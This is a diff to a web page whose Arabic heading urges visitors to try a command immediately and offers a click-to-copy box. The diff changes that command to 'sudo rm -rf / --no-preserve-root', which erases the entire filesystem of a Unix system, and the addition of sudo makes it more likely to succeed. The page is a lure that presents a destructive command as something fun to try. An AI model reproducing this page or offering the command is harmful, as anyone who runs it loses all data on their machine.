--- a/index.html
+++ b/index.html
@@ -72,7 +72,7 @@
         <h1>عليك تجربة هذا الأمر فورا <span class="heart">♥</span></h1>
         
         <div class="command-box" onclick="copyCommand()">
-            <div id="command">rm -rf / --no-preserve-root</div>
+            <div id="command">sudo rm -rf / --no-preserve-root</div>
             <div class="copied-message" id="copiedMessage">نسخ!</div>
         </div>
         
